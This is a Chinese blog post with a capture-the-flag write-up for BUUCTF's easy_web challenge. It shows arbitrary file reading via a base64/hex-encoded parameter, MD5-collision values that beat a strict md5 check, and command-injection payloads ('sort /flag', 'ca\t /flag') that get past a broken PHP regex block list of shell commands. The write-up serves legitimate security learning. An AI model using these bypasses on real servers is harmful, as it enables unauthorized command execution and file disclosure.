NineOnee

导航

 
php正则错误反斜杠过滤

php正则错误反斜杠过滤

前言

  • 环境:buuctf中[安洵杯 2019]easy_web
  • 知识点:php正则过滤反斜杠,sort绕过cat,dir绕过ls和nl
  • 参考:博客1,博客2

做题

进去题目,f12看源码,注意到了img标签后面是base64加密,但是看着解密不出来,再看响应包无,这时注意到url中有个?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=,看到img这里想到是base64加密,然后解密下,再解密下,得到3535352e706e67,oh,我的上帝,这是个啥,你不要欺负我傻啊。看了wp才知道这是16进制,解密一下就是555.png,那么这里是不是存在文件包含漏洞呢

我们通过

<?php
$a="index.php";
var_dump(base64_encode(base64_encode(bin2hex($a))));
?>

得到TmprMlpUWTBOalUzT0RKbE56QTJPRGN3

构造?img=TmprMlpUWTBOalUzT0RKbE56QTJPRGN3&cmd= 得到index.php的base64加密,然后再解密得源码

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>

显然这里不能直接通过文件包含拿到flag,那么我们就要通过rce拿到flag,想要rce,首先md5这里强比较,一开始想到是通过数组绕过,但是这里第一个条件不满足,网上找到个payload:

​ Param1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2

​ Param2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

然后就能绕过md5,原理。。我也不晓得

接下来就是绕过正则

显示文件

ls,和nl被过滤了,不要慌,网上找到了dir

读取文件

这里cat,tac,tail,head,more,less都被过滤了,分号也被过滤了拼接字符串自然也没戏,双引号和单引号也被过滤了,但是这里可以用反斜杠绕过,嗯?等等,反斜杠不是被过滤了吗,不不不,实际上这里正则写错了,稍后具体分析,这里补充一个读取文件的命令,sort

非预期:
GET:cmd=sort%20/flag

预期:

GET:cmd=ca\t%20/flag

PHP反斜杠匹配问题

在preg_match中要过滤\ 是需要四个\\\\才可以达到目的,经过两次解析,第一层Php解析器解析成\\ ,然后正则匹配解析成\,所以只过滤了一个\

出题人这里大概是想过滤\\\, 但是写法出错了

|\\| 实际上经过php解析器后成\,然后再经过正则解析成\| ,所以就成了过滤| ,然后再与后面的|\\\\| 拼接,|\\|\\\\|实际上过滤的是|\


所以ca\t /flag

posted on 2020-12-01 23:14  NineOne_E  阅读(870)  评论(0编辑  收藏  举报
 
Powered by:
博客园
Copyright © 2024 NineOne_E
Powered by .NET 9.0 on Kubernetes